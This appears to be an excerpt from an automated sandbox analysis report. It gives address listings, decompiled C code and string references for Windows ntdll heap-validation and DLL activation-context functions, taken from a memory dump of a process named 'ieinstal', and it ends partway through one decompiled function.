0x1efd40d1
0x1efd40d3
0x1efd40d8
0x1efd40de
0x1efd40e1
0x1efd40e4
0x1efd40e7
0x1efd40ea
0x1efd40ed
0x1efd40f0
0x1efd40f2
0x1efd40f5
0x1efd40f7
0x1efd40f7
0x1efd40f7
0x1efd40f7
0x1efd40fa
0x1efd40fd
0x1efd4103
0x1efd410c
0x1efd4112
0x1efd4115
0x1efd4117
0x1efd411a
0x1efd411d
0x1efd411d
0x1efd4126
0x1efd412b
0x1efd412e
0x1efd4131
0x1efd4134
0x1efd420c
0x1efd420f
0x1efd4212
0x1efd4218
0x00000000
0x1efd4214
0x1efd4214
0x00000000
0x1efd4214
0x00000000
0x1efd413a
0x1efd413a
0x1efd413d
0x1efd41e3
0x1efd41e9
0x1efd41f0
0x1efd4207
0x1efd4143
0x1efd4143
0x1efd4146
0x1efd414c
0x1efd4150
0x1efd4155
0x1efd4157
0x1efd415a
0x1efd416a
0x1efd4172
0x1efd4174
0x1efd4187
0x1efd418c
0x1efd418c
0x1efd418f
0x1efd418f
0x1efd4198
0x1efd4198
0x1efd419a
0x1efd41a0
0x1efd41e0
0x00000000
0x1efd41a2
0x1efd41a8
0x1efd41a8
0x1efd41a0
0x1efd413d
0x1efd41ab
0x1efd41ab
0x1efd41ab
0x1efd4103
0x1efd41ae
0x1efd41b1
0x1efd41b4
0x1efd41b6
0x1efd41b9
0x1efd41bd
0x1efd422a
0x1efd422a
0x1efd422d
0x1efd4230
0x1efd4239
0x1efd4240
0x1efd4246
0x1efd4249
0x1efd424b
0x1efd424e
0x1efd4250
0x1efd4250
0x1efd4253
0x1efd4253
0x1efd424e
0x1efd4263
0x1efd4268
0x1efd426b
0x1efd426d
0x1efd426f
0x1efd4276
0x1efd427a
0x1efd429c
0x1efd42a1
0x1efd42a6
0x1efd427c
0x1efd4292
0x1efd4297
0x1efd4297
0x1efd42b1
0x1efd42b8
0x1efd42bd
0x1efd42c0
0x1efd42c6
0x1efd42ca
0x1efd42cc
0x1efd42d3
0x1efd42d9
0x1efd42da
0x1efd42da
0x1efd42ca
0x1efd426d
0x1efd42e1
0x1efd42e5
0x1efd42e9
0x1efd42eb
0x1efd42f7
0x1efd42f9
0x1efd42fc
0x1efd4309
0x1efd41bf
0x1efd41c3
0x1efd41c8
0x1efd41ca
0x00000000
0x1efd41cc
0x1efd41d6
0x1efd41d6
0x1efd41ca
0x1efd41bd
0x1efd4072
0x1efd4321
0x1efd4321
0x1efd4321
0x1efd4022
0x1efd4324
0x1efd4327
0x1efd432a
0x1efd432e
0x1efd4377
0x1efd4377
0x1efd4330
0x1efd4330
0x1efd4332
0x1efd433b
0x1efd433d
0x1efd4354
0x1efd4356
0x1efd4374
0x00000000
0x1efd4358
0x1efd4358
0x1efd436a
0x1efd436f
0x1efd4380
0x1efd4380
0x1efd4380
0x1efd438b
0x1efd438e
0x1efd4390
0x00000000
0x00000000
0x1efd4396
0x1efd4398
0x1efd439d
0x1efd439f
0x1efd43ad
0x1efd43b2
0x1efd43b4
0x1efd43b6
0x1efd43bb
0x1efd43bb
0x1efd43b4
0x1efd43c0
0x1efd43c4
0x1efd43ca
0x1efd43cd
0x1efd43cf
0x1efd43d2
0x1efd43d5
0x1efd43d8
0x1efd43da
0x1efd43dd
0x1efd43df
0x1efd451b
0x1efd4527
0x1efd43e5
0x1efd43e5
0x1efd43e7
0x00000000
0x1efd43ed
0x1efd43f0
0x1efd43f3
0x1efd43f9
0x1efd43fb
0x1efd43fd
0x1efd4400
0x1efd4400
0x1efd4403
0x1efd4405
0x00000000
0x00000000
0x1efd4407
0x1efd4409
0x1efd440b
0x1efd445a
0x00000000
0x1efd440d
0x1efd440d
0x1efd440d
0x00000000
0x1efd440b
0x1efd4410
0x1efd4423
0x1efd4428
0x1efd4428
0x1efd442b
0x1efd442e
0x1efd4430
0x1efd4433
0x1efd4437
0x1efd445e
0x1efd445e
0x1efd4461
0x1efd4464
0x1efd446d
0x1efd4474
0x1efd447a
0x1efd447d
0x1efd447f
0x1efd4482
0x1efd4484
0x1efd4484
0x1efd4487
0x1efd4487
0x1efd4482
0x1efd4497
0x1efd449c
0x1efd449f
0x1efd44a1
0x1efd44a7
0x1efd44ae
0x1efd44b2
0x1efd44d4
0x1efd44d9
0x1efd44de
0x1efd44b4
0x1efd44ca
0x1efd44cf
0x1efd44cf
0x1efd44e9
0x1efd44f0
0x1efd44f5
0x1efd44f8
0x1efd44fe
0x1efd4502
0x1efd4504
0x1efd450b
0x1efd4511
0x1efd4512
0x1efd4512
0x1efd4502
0x1efd44a1
0x1efd4439
0x1efd443d
0x1efd4442
0x1efd4444
0x00000000
0x1efd4446
0x1efd4450
0x1efd4450
0x1efd4444
0x1efd4437
0x1efd43e7
0x1efd452c
0x1efd4530
0x1efd4530
0x1efd4533
0x1efd4533
0x1efd4536
0x1efd4539
0x1efd453b
0x1efd453e
0x1efd4541
0x1efd4544
0x1efd4546
0x1efd4549
0x1efd454b
0x1efd480b
0x1efd4817
0x00000000
0x1efd4551
0x1efd4551
0x1efd4553
0x00000000
0x1efd4559
0x1efd455c
0x1efd455f
0x1efd4565
0x1efd4568
0x1efd456a
0x1efd4570
0x1efd4573
0x1efd4576
0x1efd4576
0x1efd4579
0x1efd457b
0x00000000
0x00000000
0x1efd4584
0x1efd4586
0x1efd4588
0x1efd46f1
0x1efd46f3
0x1efd46f6
0x00000000
0x1efd458e
0x1efd458e
0x1efd458e
0x1efd458f
0x1efd458f
0x1efd4592
0x1efd4592
0x1efd4597
0x1efd459a
0x1efd459d
0x1efd45a1
0x1efd45a4
0x1efd45a6
0x1efd45a6
0x1efd45a8
0x1efd45af
0x1efd45b5
0x1efd45b7
0x1efd45bc
0x1efd45bf
0x1efd45c2
0x1efd45c5
0x1efd45c8
0x1efd45cb
0x1efd45cd
0x1efd45cf
0x1efd45cf
0x1efd45cf
0x1efd45cf
0x1efd45d2
0x1efd45d5
0x1efd45d8
0x1efd45de
0x1efd45e4
0x1efd45e7
0x1efd45e9
0x1efd45ec
0x1efd45ec
0x1efd45f2
0x1efd45f7
0x1efd45fa
0x1efd45fd
0x1efd4600
0x1efd46dd
0x1efd46e0
0x1efd46e3
0x1efd46e9
0x00000000
0x1efd46e5
0x1efd46e5
0x00000000
0x1efd46e5
0x00000000
0x1efd4606
0x1efd4606
0x1efd4609
0x1efd46ae
0x1efd46b4
0x1efd46bb
0x1efd46c3
0x1efd46d8
0x1efd460f
0x1efd460f
0x1efd4612
0x1efd4618
0x1efd461c
0x1efd461e
0x1efd4621
0x1efd4624
0x1efd463d
0x1efd463f
0x1efd4652
0x1efd4657
0x1efd4657
0x1efd465a
0x1efd465a
0x1efd4663
0x1efd4663
0x1efd4665
0x1efd466b
0x1efd46ab
0x00000000
0x1efd466d
0x1efd4673
0x1efd4673
0x1efd466b
0x1efd4609
0x1efd4600
0x1efd4676
0x1efd4676
0x00000000
0x1efd4676
0x1efd457d
0x1efd4580
0x00000000
0x1efd4580
0x1efd4679
0x1efd4679
0x1efd467c
0x1efd467f
0x1efd4681
0x1efd4684
0x1efd4688
0x1efd46fe
0x1efd46fe
0x1efd4701
0x1efd4704
0x1efd470d
0x1efd4714
0x1efd471a
0x1efd471d
0x1efd471f
0x1efd4722
0x1efd4724
0x1efd4724
0x1efd4727
0x1efd4727
0x1efd4722
0x1efd473a
0x1efd473f
0x1efd4742
0x1efd4744
0x1efd47bd
0x1efd4746
0x1efd4746
0x1efd474d
0x1efd4751
0x1efd4773
0x1efd4778
0x1efd4753
0x1efd4769
0x1efd476e
0x1efd4783
0x1efd478b
0x1efd4792
0x1efd479a
0x1efd47a0
0x1efd47a4
0x1efd47a6
0x1efd47ad
0x1efd47b3
0x1efd47b4
0x1efd47b4
0x1efd47a4
0x1efd4744
0x1efd47c0
0x1efd47c4
0x1efd47ce
0x1efd47d0
0x1efd47d3
0x1efd47d6
0x1efd47dd
0x1efd47dd
0x1efd47e0
0x1efd47e5
0x1efd468a
0x1efd468e
0x1efd4693
0x1efd4695
0x00000000
0x1efd4697
0x1efd46a1
0x1efd481c
0x1efd481c
0x00000000
0x1efd481c
0x1efd4695
0x1efd4688
0x1efd4553
0x00000000
0x1efd454b
0x1efd47e8
0x1efd47e8
0x00000000
0x1efd47e8
0x1efd4356
0x00000000
0x1efd432e
0x1efd47eb
0x1efd47eb
0x1efd47ee
0x1efd4824
0x1efd4829
0x1efd482c
0x1efd4857
0x1efd4857
0x1efd485d
0x1efd4db4
0x1efd4db6
0x1efd4db8
0x1efd4863
0x1efd4863
0x1efd4867
0x1efd4cb7
0x1efd4cba
0x1efd4cbe
0x1efd4cc2
0x1efd4cc6
0x1efd4cd9
0x1efd4cde
0x1efd4cde
0x1efd4cde
0x1efd4cde
0x1efd4ce2
0x1efd4ce8
0x1efd4cef
0x1efd4d04
0x1efd4cf1
0x1efd4cfa
0x1efd4cfc
0x1efd4cfc
0x1efd4d06
0x1efd4d06
0x1efd4d08
0x00000000
0x00000000
0x1efd4d0a
0x1efd4d0e
0x1efd4d2a
0x1efd4d2e
0x1efd4d10
0x1efd4d10
0x1efd4d13
0x1efd4d16
0x1efd4d19
0x1efd4d1b
0x1efd4d1b
0x1efd4d1e
0x1efd4d1e
0x1efd4d21
0x1efd4d25
0x1efd4d25
0x1efd4d35
0x1efd4d37
0x1efd4d39
0x1efd4d3b
0x00000000
0x1efd4d3b
0x00000000
0x1efd4d37
0x1efd4d43
0x1efd4d46
0x1efd4d49
0x1efd4d4b
0x1efd4d4d
0x1efd4d61
0x1efd4d63
0x1efd4d66
0x1efd4d4f
0x1efd4d4f
0x1efd4d51
0x1efd4d54
0x1efd4d56
0x1efd4d56
0x1efd4d6e
0x1efd4d71
0x1efd4d77
0x1efd4d79
0x1efd4d7f
0x1efd4d82
0x1efd4d82
0x1efd4d85
0x1efd4d87
0x00000000
0x00000000
0x1efd4d89
0x1efd4d8b
0x1efd4d8d
0x1efd4daf
0x00000000
0x1efd4d8f
0x1efd4d8f
0x1efd4d8f
0x00000000
0x1efd4d8d
0x1efd4d92
0x1efd4da3
0x1efd4da5
0x1efd4da5
0x1efd486d
0x1efd486d
0x1efd4870
0x1efd4873
0x1efd4877
0x1efd487b
0x1efd4881
0x1efd4887
0x1efd488a
0x1efd488c
0x1efd4b13
0x1efd4892
0x1efd4892
0x1efd4892
0x1efd4895
0x1efd4897
0x00000000
0x00000000
0x1efd4899
0x1efd489b
0x1efd489d
0x1efd4b06
0x1efd4b08
0x1efd4b0b
0x00000000
0x1efd48a3
0x1efd48a3
0x1efd48a6
0x1efd48a6
0x1efd48a6
0x1efd48a9
0x1efd48b3
0x1efd48b6
0x1efd48bd
0x1efd48c0
0x1efd48c3
0x1efd48c6
0x1efd48c8
0x00000000
0x00000000
0x1efd48ca
0x1efd4aea
0x1efd4aea
0x1efd4aec
0x1efd4af9
0x1efd4af9
0x1efd4afb
0x1efd4afe
0x00000000
0x1efd4afe
0x1efd4aee
0x00000000
0x1efd48d1
0x1efd48d1
0x1efd48d4
0x1efd48d7
0x1efd48d9
0x1efd48df
0x1efd48e3
0x1efd48e5
0x1efd48e8
0x1efd4901
0x1efd4903
0x1efd4915
0x1efd491a
0x1efd491a
0x1efd4903
0x1efd4923
0x1efd4925
0x1efd492b
0x1efd492d
0x1efd4938
0x1efd493b
0x1efd493e
0x1efd4940
0x1efd4946
0x1efd494a
0x1efd494c
0x1efd494f
0x1efd4968
0x1efd496a
0x1efd497c
0x1efd4981
0x1efd4981
0x1efd496a
0x1efd498a
0x1efd498c
0x1efd4992
0x1efd4994
0x1efd499d
0x1efd49a0
0x1efd4a3a
0x1efd4a3a
0x1efd4a3f
0x1efd4a4c
0x1efd4a52
0x1efd4a5d
0x1efd4a5d
0x1efd4a5f
0x1efd4a62
0x1efd4a62
0x1efd4a68
0x1efd4a6e
0x1efd4a70
0x00000000
0x00000000
0x1efd4a72
0x1efd4a74
0x1efd4a7e
0x1efd4a80
0x1efd4af6
0x00000000
0x00000000
0x00000000
0x00000000
0x1efd4a76
0x1efd4a76
0x1efd4a79
0x1efd4a7b
0x00000000
0x1efd4a7b
0x00000000
0x1efd4a74
0x1efd4a82
0x1efd4a85
0x1efd4aae
0x1efd4ab1
0x1efd4ab3
0x1efd4acb
0x1efd4acb
0x1efd4ab5
0x1efd4abc
0x1efd4abc
0x1efd4a87
0x1efd4a87
0x1efd4a8a
0x1efd4a8c
0x1efd4aa4
0x1efd4a8e
0x1efd4a8e
0x1efd4a8e
0x1efd4a8c
0x1efd4ad1
0x1efd4ad3
0x1efd4ad9
0x1efd4add
0x1efd4adf
0x1efd4adf
0x1efd4adf
0x1efd4ae4
0x00000000
0x1efd49a6
0x1efd49aa
0x1efd49ad
0x00000000
0x1efd49b3
0x1efd49b3
0x1efd49b6
0x1efd49ba
0x1efd49bc
0x1efd49bc
0x1efd49bc
0x1efd49c1
0x1efd49c4
0x1efd49c4
0x1efd49c6
0x00000000
0x00000000
0x1efd49c8
0x1efd49cb
0x1efd49cd
0x1efd49d3
0x1efd49d7
0x1efd49d9
0x1efd49dc
0x1efd49f5
0x1efd49f7
0x1efd4a07
0x1efd4a07
0x1efd49f7
0x1efd4a12
0x1efd4a14
0x1efd4a1a
0x1efd4a1c
0x1efd4a28
0x1efd4a2a
0x00000000
0x1efd4a1e
0x1efd4a1e
0x1efd4a20
0x1efd4a20
0x00000000
0x1efd4a1c
0x1efd4a2f
0x1efd4a32
0x00000000
0x1efd4a32
0x1efd49ad
0x1efd4996
0x1efd4996
0x00000000
0x1efd4996
0x1efd492f
0x1efd492f
0x1efd4ae7
0x1efd4ae7
0x1efd4ae7
0x00000000
0x1efd492d
0x1efd48a6
0x00000000
0x1efd489d
0x00000000
0x1efd4892
0x1efd4b15
0x1efd4b15
0x1efd4b18
0x1efd4b18
0x1efd4b1a
0x00000000
0x00000000
0x1efd4b1c
0x1efd4b20
0x1efd4b3c
0x1efd4b40
0x1efd4b22
0x1efd4b22
0x1efd4b25
0x1efd4b28
0x1efd4b2b
0x1efd4b2d
0x1efd4b2d
0x1efd4b30
0x1efd4b30
0x1efd4b33
0x1efd4b37
0x1efd4b37
0x1efd4b47
0x1efd4b49
0x1efd4b4b
0x1efd4b4d
0x00000000
0x1efd4b4d
0x00000000
0x1efd4b49
0x1efd4b55
0x1efd4b58
0x1efd4b5b
0x1efd4b5e
0x1efd4b60
0x1efd4b62
0x1efd4b76
0x1efd4b76
0x1efd4b78
0x1efd4b7b
0x1efd4b64
0x1efd4b64
0x1efd4b66
0x1efd4b69
0x1efd4b6b
0x1efd4b6b
0x1efd4b83
0x1efd4b86
0x1efd4b8c
0x1efd4b8f
0x1efd4b91
0x1efd4b97
0x1efd4ba0
0x1efd4ba0
0x1efd4ba3
0x1efd4ba5
0x00000000
0x00000000
0x1efd4ba7
0x1efd4ba9
0x1efd4bab
0x1efd4cad
0x1efd4caf
0x00000000
0x1efd4bb1
0x1efd4bb1
0x1efd4bb1
0x00000000
0x1efd4bab
0x1efd4bb4
0x1efd4bbd
0x1efd4bc2
0x1efd4bc5
0x1efd4bc8
0x1efd4bcc
0x1efd4bcf
0x1efd4bd1
0x1efd4bd1
0x1efd4bd3
0x1efd4bd9
0x1efd4be5
0x1efd4bec
0x1efd4bee
0x1efd4bf1
0x1efd4bf3
0x1efd4bf3
0x1efd4bf3
0x1efd4bf3
0x1efd4bf6
0x1efd4bf9
0x1efd4bfb
0x1efd4c5d
0x1efd4c5d
0x1efd4c60
0x1efd4c66
0x1efd4c69
0x1efd4bfd
0x1efd4bfd
0x1efd4c00
0x1efd4c06
0x1efd4c0a
0x1efd4c0c
0x1efd4c0f
0x1efd4c28
0x1efd4c2a
0x1efd4c3d
0x1efd4c42
0x1efd4c42
0x1efd4c45
0x1efd4c45
0x1efd4c4e
0x1efd4c50
0x1efd4c56
0x1efd4c58
0x1efd4c5b
0x00000000
0x00000000
0x1efd4c5b
0x1efd4c6c
0x1efd4c6e
0x1efd4c72
0x1efd4c78
0x1efd4c80
0x1efd4c83
0x1efd4c88
0x1efd4c8b
0x1efd4c8b
0x1efd4c8b
0x1efd4c8b
0x1efd4c6e
0x1efd4b91
0x1efd4c8e
0x1efd4c92
0x1efd4ca0
0x1efd4ca6
0x1efd4ca6
0x1efd4c92
0x1efd4dbd
0x1efd4dc0
0x1efd4dc5
0x1efd4dc7
0x1efd4dcb
0x1efd4dd0
0x1efd4dda
0x1efd4ddd
0x1efd4ddf
0x1efd4de0
0x1efd4de4
0x1efd4de4
0x1efd4ddd
0x1efd4dec
0x1efd4def
0x1efd4df5
0x1efd4df8
0x1efd4dfc
0x1efd4e05
0x1efd4e0b
0x1efd4e0b
0x1efd4e0b
0x1efd4e11
0x1efd4e17
0x1efd4e1b
0x1efd4e22
0x1efd4e2c
0x1efd4e2c
0x00000000
0x1efd4e22
0x1efd482e
0x1efd482e
0x1efd4834
0x00000000
0x1efd4836
0x1efd483a
0x1efd483e
0x00000000
0x1efd4840
0x1efd4843
0x1efd4847
0x1efd484e
0x00000000
0x1efd484e
0x1efd483e
0x1efd4834
0x1efd47f0
0x1efd47f5
0x1efd47f8
0x00000000
0x1efd47fa
0x1efd47fd
0x1efd4801
0x1efd4e30
0x1efd4e30
0x1efd4e30
0x1efd47f8
0x1efd4e33
0x1efd4e35
0x1efd4e35
0x1efd3dc7
0x1efd3dc7
0x1efd3dcd
0x1efd3dd7
0x1efd3ddc
0x1efd3e00
0x1efd3e03
0x1efd3e17
0x1efd3e1e
0x1efd3e25
0x1efd3e6f
0x1efd3e79
0x1efd3e7b
0x00000000
0x1efd3e27
0x1efd3e27
0x1efd3e31
0x1efd3e3b
0x1efd3e42
0x1efd3e52
0x1efd3e55
0x1efd3e5f
0x1efd3e61
0x1efd501b
0x1efd501b
0x1efd501b
0x1efd3e05
0x1efd3e05
0x1efd3e08
0x1efd3e0f
0x00000000
0x1efd3e0f
0x1efd3dde
0x1efd3de1
0x1efd3de4
0x1efd3deb
0x1efd3df2
0x1efd3e80
0x1efd3e80
0x1efd3e84
0x1efd3e88
0x1efd3e8b
0x1efd3e8f
0x1efd3e94
0x1efd3e9e
0x1efd3ea1
0x1efd3ea3
0x1efd3ea8
0x1efd3ea8
0x1efd3ea1
0x1efd3ead
0x1efd3eb0
0x1efd3eb6
0x1efd3eb6
0x1efd3eb9
0x1efd3ebb
0x1efd3ebd
0x1efd3ec3
0x1efd3ec5
0x1efd3ec5
0x1efd3ec7
0x1efd3ec9
0x1efd3ecb
0x1efd3f03
0x00000000
0x1efd3ecd
0x1efd3ecd
0x1efd3ed0
0x1efd3ed0
0x00000000
0x1efd3ecb
0x1efd3ed6
0x1efd3ed8
0x1efd3ef7
0x1efd3ef7
0x1efd3eda
0x1efd3eda
0x1efd3edc
0x00000000
0x1efd3ede
0x1efd3ede
0x1efd3ee1
0x1efd3ee5
0x1efd3ee7
0x1efd3ee7
0x1efd3ee7
0x1efd3eef
0x1efd3eef
0x1efd3edc
0x00000000
0x1efd3ed8
0x1efd3ddc
0x1efd501e
0x1efd5025
0x1efd5033
0x1efd5041
0x1efd3d15
0x1efd3d15
0x1efd3d19
0x1efd3d1e
0x1efd3d24
0x00000000
0x1efd3d26
0x1efd3d26
0x1efd3d2c
0x00000000
0x1efd3d2e
0x1efd3d31
0x1efd3d39
0x1efd3d47
0x1efd3d47
0x1efd3d2c
0x1efd3d24
0x1efd3cde
0x1efd3cec
0x1efd3cf6
0x1efd3d04
0x1efd3d04

Strings

HEAP: , xrefs: 1EFD429C, 1EFD44D4, 1EFD4773
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 1EFD42B3, 1EFD44EB, 1EFD478D
HEAP[%wZ]: , xrefs: 1EFD428D, 1EFD44C5, 1EFD4764

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: bd5824bb0c77ce398e7d41228f2fae2067944e8bb4c12cc32a56b4659dc2f41f
Instruction ID: d34632b02ab30dc03b0603b367da6d51fd85ce4a0e3b472c48853208aed16ba0
Opcode Fuzzy Hash: bd5824bb0c77ce398e7d41228f2fae2067944e8bb4c12cc32a56b4659dc2f41f
Instruction Fuzzy Hash: 02E2A075A003559FDB15CF69C8A0BE9BBF2FF48304F188299DC45AB385D731A849CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF4C3D Relevance: 5.1, Strings: 4, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E1EFF4C3D(void* __ecx) {
				char _v8;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t45;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_push(__ecx);
				_t45 = 0;
				_t42 = __ecx;
				_t51 =  *0x1f0b65e4; // 0x75c6f0e0
				if(_t51 == 0) {
					L10:
					return _t45;
				}
				_t40 =  *((intOrPtr*)(__ecx + 0x18));
				_t36 =  *0x1f0b5b24; // 0x3332e20
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t36) {
					_t24 =  *((intOrPtr*)(_t42 + 0x28));
					if(_t42 == _t36) {
						_t47 = 0x5c;
						if( *_t24 == _t47) {
							_t39 = 0x3f;
							if( *((intOrPtr*)(_t24 + 2)) == _t39 &&  *((intOrPtr*)(_t24 + 4)) == _t39 &&  *((intOrPtr*)(_t24 + 6)) == _t47 &&  *((intOrPtr*)(_t24 + 8)) != 0 &&  *((short*)(_t24 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t24 + 0xc)) == _t47) {
								_t24 = _t24 + 8;
							}
						}
					}
					_t48 =  *0x1f0b65e4; // 0x75c6f0e0
					 *0x1f0b91e0(_t40, _t24,  &_v8);
					_t45 =  *_t48();
					if(_t45 >= 0) {
						L8:
						_t27 = _v8;
						if(_t27 != 0) {
							if( *((intOrPtr*)(_t42 + 0x48)) != 0) {
								E1EFC26A0(_t27,  *((intOrPtr*)(_t42 + 0x48)));
								_t27 = _v8;
							}
							 *((intOrPtr*)(_t42 + 0x48)) = _t27;
						}
						if(_t45 < 0) {
							if(( *0x1f0b37c0 & 0x00000003) != 0) {
								E1F03E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t45);
							}
							if(( *0x1f0b37c0 & 0x00000010) != 0) {
								asm("int3");
							}
						}
						goto L10;
					}
					if(_t45 != 0xc000008a) {
						if(_t45 != 0xc000008b && _t45 != 0xc0000089 && _t45 != 0xc000000f && _t45 != 0xc0000204 && _t45 != 0xc0000002) {
							if(_t45 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1f0b37c0 & 0x00000005) != 0) {
						_push(_t45);
						_t18 = _t42 + 0x24; // 0x123
						E1F03E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t18);
						_t49 = _t49 + 0x1c;
					}
					_t45 = 0;
					goto L8;
				} else {
					goto L10;
				}
			}

0x1eff4c42
0x1eff4c47
0x1eff4c4a
0x1eff4c4c
0x1eff4c52
0x1eff4cb8
0x1eff4cbe
0x1eff4cbe
0x1eff4c5a
0x1eff4c5d
0x1eff4c69
0x1eff4c6f
0x1eff4c74
0x1eff4cd6
0x1eff4cda
0x1f0333b9
0x1f0333be
0x1f0333f7
0x1f0333f7
0x1f0333be
0x1eff4cda
0x1eff4c76
0x1eff4c84
0x1eff4c8c
0x1eff4c90
0x1eff4ca9
0x1eff4ca9
0x1eff4cae
0x1eff4ce4
0x1eff4cee
0x1eff4cf3
0x1eff4cf3
0x1eff4ce6
0x1eff4ce6
0x1eff4cb2
0x1f033463
0x1f03347b
0x1f033480
0x1f03348a
0x1f033490
0x1f033490
0x1f03348a
0x00000000
0x1eff4cb2
0x1eff4c98
0x1eff4cc5
0x1f033429
0x00000000
0x00000000
0x1f03342f
0x1eff4cc5
0x1eff4ca1
0x1f033434
0x1f033435
0x1f03344f
0x1f033454
0x1f033454
0x1eff4ca7
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 1F03344A, 1F033476
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1F033439
Querying the active activation context failed with status 0x%08lx, xrefs: 1F033466
LdrpFindDllActivationContext, xrefs: 1F033440, 1F03346C

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: e95aaa8422c02edd33c16c2490c233311725ba4eca95324cac81ce7e6b716d0e
Instruction ID: 076894614b9fe4608495c29293d6a7c20bcedc81cb9b95c3a815a3fe5ee4dba3
Opcode Fuzzy Hash: e95aaa8422c02edd33c16c2490c233311725ba4eca95324cac81ce7e6b716d0e
Instruction Fuzzy Hash: 3531DB73D00262EFDB21DB0488B4E99B6A5FB41364F039356ED4557770E7629D80C2A5

Uniqueness

Uniqueness Score: -1.00%

Function 1F070D24 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 1F070E56
HEAP: , xrefs: 1F070DCA, 1F070DDD, 1F070DDF, 1F070E44
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 1F070DE1
HEAP[%wZ]: , xrefs: 1F070DBD, 1F070E37

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 255b4d3b98c9d85399e20e84aa52dab18ebe00d60276f9ca8f6249a1f174955b
Instruction ID: 747225882ad980c5e6f8155fc7078e6959f0d48f6b165c01b996aa2853cefb18
Opcode Fuzzy Hash: 255b4d3b98c9d85399e20e84aa52dab18ebe00d60276f9ca8f6249a1f174955b
Instruction Fuzzy Hash: C931D239504664EFE315CB68C895F9A73E9EF04760F110796F88ADB290EB31BE40DB64

Uniqueness

Uniqueness Score: -1.00%

Function 1EFD1EB2 Relevance: 4.3, Strings: 3, Instructions: 563
COMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E1EFD1EB2(signed char __ecx, signed short* __edx, signed int* _a4, char _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				unsigned int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t192;
				intOrPtr _t193;
				signed short _t196;
				signed int _t202;
				signed short _t203;
				intOrPtr _t209;
				signed int _t213;
				signed int _t216;
				signed short _t221;
				intOrPtr _t222;
				signed short _t225;
				signed int _t227;
				signed short _t228;
				intOrPtr _t234;
				signed int _t238;
				signed int _t241;
				signed int _t251;
				char _t259;
				signed short _t260;
				intOrPtr _t261;
				signed short _t263;
				intOrPtr _t264;
				signed int _t267;
				signed int _t268;
				signed short _t271;
				intOrPtr _t282;
				signed int _t288;
				signed int _t291;
				signed int _t293;
				signed int _t295;
				intOrPtr _t301;
				signed int _t305;
				signed int _t308;
				signed short* _t319;
				void* _t321;
				signed int* _t323;
				signed short* _t324;
				void* _t325;
				signed short* _t326;
				signed char _t327;
				intOrPtr _t329;
				signed int _t336;
				signed short* _t339;
				signed char _t340;
				intOrPtr _t344;
				signed int _t350;
				signed short* _t355;
				void* _t356;
				signed short* _t357;
				signed short _t358;
				signed char _t360;
				intOrPtr _t362;
				intOrPtr* _t368;
				signed char _t369;
				intOrPtr _t370;
				signed int _t377;
				signed int* _t380;
				signed int _t381;
				signed short _t383;
				signed int _t385;
				signed int _t389;
				signed int* _t390;
				unsigned int _t394;
				signed short _t396;
				signed short _t398;
				signed int _t400;
				signed int _t403;
				signed short* _t409;
				signed int* _t410;
				signed char _t416;
				void* _t418;
				void* _t419;

				_t322 = __ecx;
				_t419 = _t418 - 0x1c;
				_t319 = __edx;
				_t409 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				_t416 = __ecx;
